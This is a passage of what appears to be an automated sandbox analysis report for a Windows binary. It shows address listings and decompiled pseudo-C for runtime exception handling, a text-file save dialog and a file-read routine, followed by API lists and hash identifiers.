                                                                                              0x013546d0
                                                                                              0x013546d0
                                                                                              0x013546d2
                                                                                              0x013546d7
                                                                                              0x013546d9
                                                                                              0x013546dc
                                                                                              0x013546de
                                                                                              0x013546f4
                                                                                              0x01354714
                                                                                              0x01354714
                                                                                              0x01354718
                                                                                              0x00000000
                                                                                              0x013546e0
                                                                                              0x013546e0
                                                                                              0x0135472a
                                                                                              0x0135472d
                                                                                              0x01354733
                                                                                              0x01354735
                                                                                              0x0135473c
                                                                                              0x01354743
                                                                                              0x01354748
                                                                                              0x0135474b
                                                                                              0x0135474d
                                                                                              0x0135474f
                                                                                              0x0135475c
                                                                                              0x01354762
                                                                                              0x01354764
                                                                                              0x01354767
                                                                                              0x01354767
                                                                                              0x0135476a
                                                                                              0x0135476a
                                                                                              0x0135473c
                                                                                              0x01354770
                                                                                              0x01354772
                                                                                              0x01354777
                                                                                              0x0135477a
                                                                                              0x0135477d
                                                                                              0x01354785
                                                                                              0x01354789
                                                                                              0x0135478e
                                                                                              0x0135478e
                                                                                              0x01354791
                                                                                              0x01354795
                                                                                              0x01354798
                                                                                              0x013547a8
                                                                                              0x013547ad
                                                                                              0x013547ae
                                                                                              0x013547af
                                                                                              0x013547b0
                                                                                              0x013547b1
                                                                                              0x013547b2
                                                                                              0x013547b6
                                                                                              0x013547ba
                                                                                              0x013547c2
                                                                                              0x013547c4
                                                                                              0x013547c6
                                                                                              0x013547d0
                                                                                              0x013547d0
                                                                                              0x013547d3
                                                                                              0x01354cab
                                                                                              0x01354cab
                                                                                              0x01354cab
                                                                                              0x01354cae
                                                                                              0x01354cb0
                                                                                              0x01354cb2
                                                                                              0x01354cb2
                                                                                              0x01354cb5
                                                                                              0x01354cb9
                                                                                              0x01354cbb
                                                                                              0x01354cbe
                                                                                              0x01354cc1
                                                                                              0x01354cc1
                                                                                              0x01354cc1
                                                                                              0x01354cc8
                                                                                              0x01354cc8
                                                                                              0x01354ccb
                                                                                              0x01354ccf
                                                                                              0x01354cd1
                                                                                              0x01354cd2
                                                                                              0x01354cd3
                                                                                              0x01354cd3
                                                                                              0x01354cd3
                                                                                              0x01354ccb
                                                                                              0x00000000
                                                                                              0x013547d9
                                                                                              0x013547d9
                                                                                              0x013547df
                                                                                              0x013547f4
                                                                                              0x013547fc
                                                                                              0x0135480b
                                                                                              0x01354810
                                                                                              0x01354820
                                                                                              0x01354820
                                                                                              0x01354828
                                                                                              0x00000000
                                                                                              0x0135482e
                                                                                              0x0135482e
                                                                                              0x01354834
                                                                                              0x00000000
                                                                                              0x0135483a
                                                                                              0x0135483a
                                                                                              0x01354840
                                                                                              0x01354846
                                                                                              0x0135484a
                                                                                              0x0135484c
                                                                                              0x0135484e
                                                                                              0x0135484e
                                                                                              0x01354851
                                                                                              0x01354851
                                                                                              0x01354854
                                                                                              0x01354856
                                                                                              0x01354856
                                                                                              0x01354859
                                                                                              0x0135485d
                                                                                              0x0135485f
                                                                                              0x01354863
                                                                                              0x01354863
                                                                                              0x01354866
                                                                                              0x01354866
                                                                                              0x01354869
                                                                                              0x0135486d
                                                                                              0x0135486d
                                                                                              0x01354870
                                                                                              0x01354876
                                                                                              0x013548dd
                                                                                              0x013548e2
                                                                                              0x013548e2
                                                                                              0x013548e8
                                                                                              0x013548e8
                                                                                              0x013548ed
                                                                                              0x013548f0
                                                                                              0x013548f5
                                                                                              0x013548fa
                                                                                              0x013548fd
                                                                                              0x01354900
                                                                                              0x01354904
                                                                                              0x0135490a
                                                                                              0x0135490e
                                                                                              0x01354912
                                                                                              0x01354918
                                                                                              0x0135491d
                                                                                              0x01354921
                                                                                              0x01354927
                                                                                              0x0135492c
                                                                                              0x0135492c
                                                                                              0x01354931
                                                                                              0x01354878
                                                                                              0x01354878
                                                                                              0x0135487c
                                                                                              0x01354936
                                                                                              0x0135493b
                                                                                              0x0135493b
                                                                                              0x01354940
                                                                                              0x01354940
                                                                                              0x01354945
                                                                                              0x01354948
                                                                                              0x0135494d
                                                                                              0x01354952
                                                                                              0x01354955
                                                                                              0x01354958
                                                                                              0x0135495c
                                                                                              0x01354962
                                                                                              0x01354966
                                                                                              0x0135496a
                                                                                              0x01354970
                                                                                              0x01354975
                                                                                              0x01354979
                                                                                              0x0135497f
                                                                                              0x01354984
                                                                                              0x01354984
                                                                                              0x01354989
                                                                                              0x0135498c
                                                                                              0x0135498c
                                                                                              0x0135498c
                                                                                              0x0135498f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354991
                                                                                              0x01354995
                                                                                              0x01354998
                                                                                              0x0135499b
                                                                                              0x0135499f
                                                                                              0x0135499f
                                                                                              0x013549a4
                                                                                              0x013549a8
                                                                                              0x013549aa
                                                                                              0x013549ac
                                                                                              0x013549ac
                                                                                              0x013549af
                                                                                              0x013549b2
                                                                                              0x013549b4
                                                                                              0x013549b4
                                                                                              0x013549b7
                                                                                              0x013549bb
                                                                                              0x013549bd
                                                                                              0x013549c1
                                                                                              0x013549c4
                                                                                              0x013549c7
                                                                                              0x013549cb
                                                                                              0x013549cb
                                                                                              0x013549d5
                                                                                              0x013549d5
                                                                                              0x01354882
                                                                                              0x01354887
                                                                                              0x01354887
                                                                                              0x0135488c
                                                                                              0x0135488c
                                                                                              0x01354891
                                                                                              0x01354894
                                                                                              0x01354899
                                                                                              0x0135489e
                                                                                              0x013548a1
                                                                                              0x013548a4
                                                                                              0x013548a8
                                                                                              0x013548ae
                                                                                              0x013548b2
                                                                                              0x013548b6
                                                                                              0x013548bc
                                                                                              0x013548c1
                                                                                              0x013548c5
                                                                                              0x013548cb
                                                                                              0x013548d0
                                                                                              0x013548d0
                                                                                              0x013548d5
                                                                                              0x013548d5
                                                                                              0x00000000
                                                                                              0x01354876
                                                                                              0x01354840
                                                                                              0x01354834
                                                                                              0x00000000
                                                                                              0x01354812
                                                                                              0x01354812
                                                                                              0x0135481a
                                                                                              0x01354c02
                                                                                              0x01354c05
                                                                                              0x01354c07
                                                                                              0x01354cf9
                                                                                              0x01354cfa
                                                                                              0x01354cfe
                                                                                              0x01354cfe
                                                                                              0x01354d01
                                                                                              0x01354d05
                                                                                              0x01354d07
                                                                                              0x01354d08
                                                                                              0x01354d09
                                                                                              0x01354d09
                                                                                              0x01354d09
                                                                                              0x01354d0c
                                                                                              0x01354d0c
                                                                                              0x01354d0f
                                                                                              0x01354d13
                                                                                              0x01354d15
                                                                                              0x01354d15
                                                                                              0x01354d18
                                                                                              0x01354d1b
                                                                                              0x01354d1b
                                                                                              0x01354d1b
                                                                                              0x01354d1e
                                                                                              0x01354d1e
                                                                                              0x01354c0d
                                                                                              0x01354c0f
                                                                                              0x01354c12
                                                                                              0x01354c12
                                                                                              0x01354c15
                                                                                              0x01354c20
                                                                                              0x01354c24
                                                                                              0x01354c29
                                                                                              0x01354c2e
                                                                                              0x01354c33
                                                                                              0x01354c37
                                                                                              0x01354c3c
                                                                                              0x01354c41
                                                                                              0x01354c46
                                                                                              0x01354c4b
                                                                                              0x01354c50
                                                                                              0x01354c55
                                                                                              0x01354c5a
                                                                                              0x01354c5f
                                                                                              0x01354c64
                                                                                              0x01354c69
                                                                                              0x01354c6e
                                                                                              0x01354c6e
                                                                                              0x01354c74
                                                                                              0x01354c7a
                                                                                              0x01354c7a
                                                                                              0x01354c7a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135481a
                                                                                              0x013547fe
                                                                                              0x013547fe
                                                                                              0x01354806
                                                                                              0x01354806
                                                                                              0x013547e1
                                                                                              0x013547e1
                                                                                              0x013547e9
                                                                                              0x01354c7d
                                                                                              0x01354c7d
                                                                                              0x01354c7f
                                                                                              0x01354c83
                                                                                              0x01354c86
                                                                                              0x01354c88
                                                                                              0x01354c90
                                                                                              0x01354c90
                                                                                              0x01354c94
                                                                                              0x01354c99
                                                                                              0x01354c9d
                                                                                              0x01354ca2
                                                                                              0x01354ca2
                                                                                              0x01354ca5
                                                                                              0x01354ca8
                                                                                              0x01354ca8
                                                                                              0x01354ca8
                                                                                              0x01354c90
                                                                                              0x00000000
                                                                                              0x01354c88
                                                                                              0x01354ce0
                                                                                              0x01354ce6
                                                                                              0x013547ef
                                                                                              0x013549d7
                                                                                              0x013549d7
                                                                                              0x013549dd
                                                                                              0x013549e1
                                                                                              0x013549e3
                                                                                              0x013549e4
                                                                                              0x013549e7
                                                                                              0x013549ea
                                                                                              0x013549ea
                                                                                              0x013549f2
                                                                                              0x013549f2
                                                                                              0x013549f4
                                                                                              0x013549f7
                                                                                              0x00000000
                                                                                              0x013549fd
                                                                                              0x01354a00
                                                                                              0x01354a05
                                                                                              0x00000000
                                                                                              0x01354a2a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354a2e
                                                                                              0x01354a30
                                                                                              0x01354a34
                                                                                              0x01354a35
                                                                                              0x01354a36
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354a3a
                                                                                              0x01354a3c
                                                                                              0x01354a3f
                                                                                              0x01354a42
                                                                                              0x01354a46
                                                                                              0x01354a47
                                                                                              0x01354a48
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354a4e
                                                                                              0x01354a50
                                                                                              0x01354a53
                                                                                              0x01354a56
                                                                                              0x01354a59
                                                                                              0x01354a5c
                                                                                              0x01354a60
                                                                                              0x01354a61
                                                                                              0x01354a62
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354a05
                                                                                              0x013549f7
                                                                                              0x013547e9
                                                                                              0x013547df
                                                                                              0x013547c8
                                                                                              0x013547c8
                                                                                              0x013547ca
                                                                                              0x01354a64
                                                                                              0x01354a67
                                                                                              0x01354a6a
                                                                                              0x01354a6d
                                                                                              0x01354bc4
                                                                                              0x01354bc4
                                                                                              0x01354bca
                                                                                              0x01354bcc
                                                                                              0x01354bcf
                                                                                              0x01354bd4
                                                                                              0x01354bd6
                                                                                              0x01354bd9
                                                                                              0x01354bd9
                                                                                              0x01354be1
                                                                                              0x01354be3
                                                                                              0x01354be5
                                                                                              0x01354be5
                                                                                              0x01354be8
                                                                                              0x01354bed
                                                                                              0x01354bef
                                                                                              0x01354bef
                                                                                              0x01354bef
                                                                                              0x01354be5
                                                                                              0x01354bfa
                                                                                              0x01354a73
                                                                                              0x01354a73
                                                                                              0x01354a7b
                                                                                              0x01354b15
                                                                                              0x01354b1b
                                                                                              0x01354b1d
                                                                                              0x01354b1d
                                                                                              0x01354b1e
                                                                                              0x01354b1f
                                                                                              0x01354b22
                                                                                              0x01354b24
                                                                                              0x01354b24
                                                                                              0x01354b2c
                                                                                              0x01354b2c
                                                                                              0x01354b2c
                                                                                              0x01354b32
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354b34
                                                                                              0x01354b3a
                                                                                              0x01354b40
                                                                                              0x01354b44
                                                                                              0x01354b49
                                                                                              0x01354b4e
                                                                                              0x01354b53
                                                                                              0x01354b58
                                                                                              0x01354b5d
                                                                                              0x01354b62
                                                                                              0x01354b67
                                                                                              0x01354b6b
                                                                                              0x01354b70
                                                                                              0x01354b75
                                                                                              0x01354b7a
                                                                                              0x01354b7f
                                                                                              0x01354b84
                                                                                              0x01354b89
                                                                                              0x01354b8e
                                                                                              0x01354b94
                                                                                              0x01354b9a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354b9a
                                                                                              0x01354b9c
                                                                                              0x01354b9f
                                                                                              0x01354ba1
                                                                                              0x01354ba1
                                                                                              0x01354ba4
                                                                                              0x01354ba7
                                                                                              0x01354bab
                                                                                              0x01354bb0
                                                                                              0x01354bb4
                                                                                              0x01354bb9
                                                                                              0x01354bbc
                                                                                              0x01354bbc
                                                                                              0x01354ba1
                                                                                              0x00000000
                                                                                              0x01354b9f
                                                                                              0x00000000
                                                                                              0x01354a81
                                                                                              0x01354a81
                                                                                              0x01354a87
                                                                                              0x01354a8b
                                                                                              0x01354a8e
                                                                                              0x01354a8e
                                                                                              0x01354a90
                                                                                              0x01354a90
                                                                                              0x01354a93
                                                                                              0x01354a96
                                                                                              0x01354a97
                                                                                              0x01354a98
                                                                                              0x01354a98
                                                                                              0x01354a98
                                                                                              0x01354a90
                                                                                              0x01354a9d
                                                                                              0x01354aa0
                                                                                              0x00000000
                                                                                              0x01354aa6
                                                                                              0x01354ab4
                                                                                              0x01354ab5
                                                                                              0x01354ab7
                                                                                              0x01354ab8
                                                                                              0x00000000
                                                                                              0x01354ad6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354adb
                                                                                              0x01354ade
                                                                                              0x01354ae2
                                                                                              0x01354ae3
                                                                                              0x01354ae4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354ae8
                                                                                              0x01354aeb
                                                                                              0x01354aee
                                                                                              0x01354af1
                                                                                              0x01354af4
                                                                                              0x01354af8
                                                                                              0x01354af9
                                                                                              0x01354afa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354afc
                                                                                              0x01354aff
                                                                                              0x01354b02
                                                                                              0x01354b05
                                                                                              0x01354b08
                                                                                              0x01354b0b
                                                                                              0x01354b0e
                                                                                              0x01354b12
                                                                                              0x01354b13
                                                                                              0x01354b14
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354ab8
                                                                                              0x01354aa0
                                                                                              0x01354a7b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013547ca
                                                                                              0x013546e2
                                                                                              0x00000000
                                                                                              0x013546e2
                                                                                              0x013546e0
                                                                                              0x013546de
                                                                                              0x00000000
                                                                                              0x013546e7
                                                                                              0x013546e7
                                                                                              0x013546e9
                                                                                              0x013546f0
                                                                                              0x00000000
                                                                                              0x013546f2
                                                                                              0x00000000
                                                                                              0x013546f0
                                                                                              0x013546b5
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 01354687
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0135468F
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 01354718
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 01354743
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 01354798
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 9024d2891c3459c6a77b674381b67589e5d4f15e33d48be27b1eeb401afc9d19
                                                                                              • Instruction ID: d2093eab2ae2b4d1d80426d1e949f12d07c83ee94eda0d4d203557223fc9be15
                                                                                              • Opcode Fuzzy Hash: 9024d2891c3459c6a77b674381b67589e5d4f15e33d48be27b1eeb401afc9d19
                                                                                              • Instruction Fuzzy Hash: 2D41BE34A00209EBCF14DF6CC880E9EBBA9AF45728F148095ED159B355E731EA91CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01351070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54stringwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E01351070() {
				char _v524;
				int _v528;
				int _v532;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v552;
				intOrPtr _v560;
				int _v580;
				WCHAR* _v584;
				intOrPtr _v600;
				intOrPtr _v604;
				struct tagOFNA _v608;
				struct tagOFNA _t19;
				intOrPtr _t20;
				int _t28;
				WCHAR* _t29;
				struct tagOFNA* _t30;

				_t30 =  &_v608;
				_t28 = GetWindowTextLengthW( *0x139ebd8);
				if(SendMessageW( *0x139ebd8, 0xb8, 0, 0) != 0 && _t28 != 0 &&  *0x139f05c == 0) {
					asm("xorps xmm0, xmm0");
					asm("movups [esp+0x10], xmm0");
					asm("movups [esp+0x20], xmm0");
					asm("movups [esp+0x30], xmm0");
					asm("movups [esp+0x40], xmm0");
					_v528 = 0;
					_v532 = 0;
					_t29 =  &_v524;
					lstrcpyW(_t29, L"*.txt");
					 *_t30 = 0x58;
					_t19 =  *0x139ebd0; // 0x0
					_v608 = _t19;
					_t20 =  *0x139ebcc; // 0x0
					_v604 = _t20;
					_v600 = 0x139f470;
					_v584 = _t29;
					_v580 = 0;
					_v560 = 0x880866;
					_v544 = E01351870;
					_v540 = 0x190;
					_v552 = L"txt";
					 *0x139f934 =  *0x139f46c;
					 *0x139f938 = 0;
					return 0 | GetSaveFileNameW(_t30) != 0x00000000;
				}
				return 1;
			}




















                                                                                              0x01351071
                                                                                              0x01351083
                                                                                              0x013510a3
                                                                                              0x013510bf
                                                                                              0x013510c2
                                                                                              0x013510c7
                                                                                              0x013510cc
                                                                                              0x013510d1
                                                                                              0x013510d6
                                                                                              0x013510de
                                                                                              0x013510e6
                                                                                              0x013510f0
                                                                                              0x013510f6
                                                                                              0x013510fd
                                                                                              0x01351102
                                                                                              0x01351106
                                                                                              0x0135110b
                                                                                              0x0135110f
                                                                                              0x01351117
                                                                                              0x0135111b
                                                                                              0x01351123
                                                                                              0x0135112b
                                                                                              0x01351133
                                                                                              0x0135113b
                                                                                              0x01351148
                                                                                              0x0135114d
                                                                                              0x00000000
                                                                                              0x01351166
                                                                                              0x01351170

                                                                                              APIs
                                                                                              • GetWindowTextLengthW.USER32 ref: 0135107D
                                                                                              • SendMessageW.USER32(000000B8,00000000,00000000), ref: 01351094
                                                                                              • lstrcpyW.KERNEL32 ref: 013510F0
                                                                                              • GetSaveFileNameW.COMDLG32 ref: 0135115A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileLengthMessageNameSaveSendTextWindowlstrcpy
                                                                                              • String ID: *.txt$txt
                                                                                              • API String ID: 4130679656-571010898
                                                                                              • Opcode ID: 780de59bddd150cf3b7f32b531aec6e6efadf35b0d8dc008382c8dc0e0331c8f
                                                                                              • Instruction ID: b95c24ecc3e17a73d2b26779a4014765b11751ccf580e8857aa5842412930fd3
                                                                                              • Opcode Fuzzy Hash: 780de59bddd150cf3b7f32b531aec6e6efadf35b0d8dc008382c8dc0e0331c8f
                                                                                              • Instruction Fuzzy Hash: 18218E719093419FE760CF14D91872BBBF8BB88708F009A1DF88596394D7B689888F82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013810AE Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E013810AE(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				signed int _v12;
				void* _v16;
				signed int _v20;
				long _v24;
				void* _v28;
				char _v32;
				void* _v36;
				long _v40;
				signed int* _t132;
				signed int _t134;
				signed int _t135;
				long _t138;
				signed int _t141;
				signed int _t143;
				signed char _t145;
				intOrPtr _t153;
				long _t155;
				signed int _t156;
				signed int _t157;
				signed int _t159;
				long _t160;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t168;
				signed int _t170;
				signed int _t172;
				char _t174;
				char _t179;
				char _t184;
				signed char _t191;
				long _t197;
				signed int _t200;
				intOrPtr _t203;
				long _t204;
				signed int _t205;
				unsigned int _t208;
				signed int _t210;
				signed int _t216;
				signed char _t217;
				long _t218;
				long _t219;
				void* _t220;
				signed int _t221;
				char* _t223;
				char* _t224;
				char* _t225;
				signed int _t230;
				signed int _t231;
				void* _t235;
				void* _t237;
				void* _t238;
				void* _t239;

				_t200 = _a4;
				_t238 = _t237 - 0x24;
				if(_t200 != 0xfffffffe) {
					__eflags = _t200;
					if(_t200 < 0) {
						L60:
						_t132 = E01367721();
						 *_t132 =  *_t132 & 0x00000000;
						__eflags =  *_t132;
						 *((intOrPtr*)(E013676C8())) = 9;
						L61:
						_t134 = E01364C41();
						goto L62;
					}
					__eflags = _t200 -  *0x13a0fa0;
					if(_t200 >=  *0x13a0fa0) {
						goto L60;
					}
					_t216 = _t200 >> 6;
					_t230 = (_t200 & 0x0000003f) * 0x38;
					_v12 = _t216;
					_v32 = 1;
					_t138 =  *((intOrPtr*)(0x13a0da0 + _t216 * 4));
					_v24 = _t138;
					_v20 = _t230;
					_t217 =  *((intOrPtr*)(_t138 + _t230 + 0x28));
					_v5 = _t217;
					__eflags = 1 & _t217;
					if((1 & _t217) == 0) {
						goto L60;
					}
					_t218 = _a12;
					__eflags = _t218 - 0x7fffffff;
					if(_t218 <= 0x7fffffff) {
						__eflags = _t218;
						if(_t218 == 0) {
							L59:
							_t135 = 0;
							goto L63;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L59;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t141 =  *((intOrPtr*)(_t138 + _t230 + 0x29));
						_v5 = _t141;
						_v28 =  *((intOrPtr*)(_t138 + _t230 + 0x18));
						_t235 = 0;
						_t143 = _t141 - 1;
						__eflags = _t143;
						if(_t143 == 0) {
							_t145 =  !_t218;
							__eflags = 1 & _t145;
							if((1 & _t145) == 0) {
								L14:
								 *(E01367721()) =  *_t146 & _t235;
								 *((intOrPtr*)(E013676C8())) = 0x16;
								E01364C41();
								goto L40;
							} else {
								_t219 = _t218 >> 1;
								_t197 = 4;
								__eflags = _t219 - 1;
								if(_t219 >= 1) {
									_t197 = _t219;
								}
								_t235 = E01367865(_t197);
								E01364B6E(0);
								E01364B6E(0);
								_t239 = _t238 + 0xc;
								_v16 = _t235;
								__eflags = _t235;
								if(_t235 != 0) {
									_t153 = L01381E3C(_t219, _a4, 0, 0, 1);
									_t238 = _t239 + 0x10;
									_t203 =  *((intOrPtr*)(0x13a0da0 + _v12 * 4));
									 *((intOrPtr*)(_t230 + _t203 + 0x20)) = _t153;
									 *(_t230 + _t203 + 0x24) = _t219;
									_t220 = _t235;
									_t155 =  *((intOrPtr*)(0x13a0da0 + _v12 * 4));
									L22:
									_v24 = _t155;
									L23:
									_t204 = _v24;
									_t230 = 0;
									_t156 = _v20;
									_v36 = _t220;
									__eflags =  *(_t156 + _t204 + 0x28) & 0x00000048;
									_t205 = _a4;
									if(( *(_t156 + _t204 + 0x28) & 0x00000048) != 0) {
										_t56 = _v24 + 0x2a; // 0x10c483c2
										_t174 =  *((intOrPtr*)(_t156 + _t56));
										_t223 = _v16;
										__eflags = _t174 - 0xa;
										if(_t174 != 0xa) {
											__eflags = _t197;
											if(_t197 != 0) {
												_t230 = 1;
												 *_t223 = _t174;
												_t224 = _t223 + 1;
												_t197 = _t197 - 1;
												__eflags = _v5;
												_v16 = _t224;
												 *((char*)(_v20 +  *((intOrPtr*)(0x13a0da0 + _v12 * 4)) + 0x2a)) = 0xa;
												_t205 = _a4;
												if(_v5 != 0) {
													_t72 =  *((intOrPtr*)(0x13a0da0 + _v12 * 4)) + 0x2b; // 0x8310c483
													_t179 =  *((intOrPtr*)(_v20 + _t72));
													_t205 = _a4;
													__eflags = _t179 - 0xa;
													if(_t179 != 0xa) {
														__eflags = _t197;
														if(_t197 != 0) {
															 *_t224 = _t179;
															_t225 = _t224 + 1;
															_t197 = _t197 - 1;
															__eflags = _v5 - 1;
															_v16 = _t225;
															_t230 = 2;
															 *((char*)(_v20 +  *((intOrPtr*)(0x13a0da0 + _v12 * 4)) + 0x2b)) = 0xa;
															_t205 = _a4;
															if(_v5 == 1) {
																_t88 =  *((intOrPtr*)(0x13a0da0 + _v12 * 4)) + 0x2c; // 0xf88310c4
																_t184 =  *((intOrPtr*)(_v20 + _t88));
																_t205 = _a4;
																__eflags = _t184 - 0xa;
																if(_t184 != 0xa) {
																	__eflags = _t197;
																	if(_t197 != 0) {
																		 *_t225 = _t184;
																		_t197 = _t197 - 1;
																		__eflags = _t197;
																		_v16 = _t225 + 1;
																		_t230 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x13a0da0 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t157 = E013852CB(_t205);
									__eflags = _t157;
									if(_t157 == 0) {
										L43:
										_v32 = 0;
										L44:
										_t198 = _v16;
										_t159 = ReadFile(_v28, _v16, _t197,  &_v24, 0);
										__eflags = _t159;
										if(_t159 == 0) {
											L55:
											_t160 = GetLastError();
											_t230 = 5;
											__eflags = _t160 - _t230;
											if(_t160 != _t230) {
												__eflags = _t160 - 0x6d;
												if(_t160 != 0x6d) {
													L39:
													E0136777A(_t160);
													goto L40;
												}
												_t231 = 0;
												goto L41;
											}
											 *((intOrPtr*)(E013676C8())) = 9;
											 *(E01367721()) = _t230;
											goto L40;
										}
										_t208 = _a12;
										__eflags = _v24 - _t208;
										if(_v24 > _t208) {
											goto L55;
										}
										_t231 = _t230 + _v24;
										__eflags = _t231;
										L47:
										_t221 = _v20;
										_t165 =  *((intOrPtr*)(0x13a0da0 + _v12 * 4));
										__eflags =  *((char*)(_t221 + _t165 + 0x28));
										if( *((char*)(_t221 + _t165 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v32;
												_push(_t231 >> 1);
												_push(_v36);
												_push(_a4);
												if(_v32 == 0) {
													_t166 = E013817CD();
												} else {
													_t166 = E013814AF();
												}
											} else {
												_t209 = _t208 >> 1;
												__eflags = _t208 >> 1;
												_t166 = E0138152A(_t208 >> 1, _t208 >> 1, _a4, _t198, _t231, _a8, _t209);
											}
											_t231 = _t166;
										}
										goto L41;
									}
									_t210 = _v20;
									_t168 =  *((intOrPtr*)(0x13a0da0 + _v12 * 4));
									__eflags =  *((char*)(_t210 + _t168 + 0x28));
									if( *((char*)(_t210 + _t168 + 0x28)) >= 0) {
										goto L43;
									}
									_t170 = GetConsoleMode(_v28,  &_v40);
									__eflags = _t170;
									if(_t170 == 0) {
										goto L43;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L44;
									}
									_t198 = _v16;
									_t172 = ReadConsoleW(_v28, _v16, _t197 >> 1,  &_v24, 0);
									__eflags = _t172;
									if(_t172 != 0) {
										_t208 = _a12;
										_t231 = _t230 + _v24 * 2;
										goto L47;
									}
									_t160 = GetLastError();
									goto L39;
								} else {
									 *((intOrPtr*)(E013676C8())) = 0xc;
									 *(E01367721()) = 8;
									L40:
									_t231 = _t230 | 0xffffffff;
									__eflags = _t231;
									L41:
									E01364B6E(_t235);
									_t135 = _t231;
									goto L63;
								}
							}
						}
						__eflags = _t143 == 1;
						if(_t143 == 1) {
							_t191 =  !_t218;
							__eflags = 1 & _t191;
							if((1 & _t191) != 0) {
								_t155 = _v24;
								_t197 = _t218;
								_t220 = _a8;
								_v16 = _t220;
								goto L22;
							}
							goto L14;
						} else {
							_t197 = _t218;
							_t220 = _a8;
							_v16 = _t220;
							goto L23;
						}
					}
					L6:
					 *(E01367721()) =  *_t139 & 0x00000000;
					 *((intOrPtr*)(E013676C8())) = 0x16;
					goto L61;
				} else {
					 *(E01367721()) =  *_t192 & 0x00000000;
					_t134 = E013676C8();
					 *_t134 = 9;
					L62:
					_t135 = _t134 | 0xffffffff;
					L63:
					return _t135;
				}
			}
























































                                                                                              0x013810b3
                                                                                              0x013810b6
                                                                                              0x013810be
                                                                                              0x013810d8
                                                                                              0x013810da
                                                                                              0x0138142e
                                                                                              0x0138142e
                                                                                              0x01381433
                                                                                              0x01381433
                                                                                              0x0138143b
                                                                                              0x01381441
                                                                                              0x01381441
                                                                                              0x00000000
                                                                                              0x01381441
                                                                                              0x013810e0
                                                                                              0x013810e6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013810f0
                                                                                              0x013810f6
                                                                                              0x013810fb
                                                                                              0x013810ff
                                                                                              0x01381102
                                                                                              0x01381109
                                                                                              0x0138110c
                                                                                              0x0138110f
                                                                                              0x01381113
                                                                                              0x01381116
                                                                                              0x01381118
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138111e
                                                                                              0x01381121
                                                                                              0x01381127
                                                                                              0x01381141
                                                                                              0x01381143
                                                                                              0x0138142a
                                                                                              0x0138142a
                                                                                              0x00000000
                                                                                              0x0138142a
                                                                                              0x01381149
                                                                                              0x0138114d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01381153
                                                                                              0x01381157
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138115e
                                                                                              0x01381162
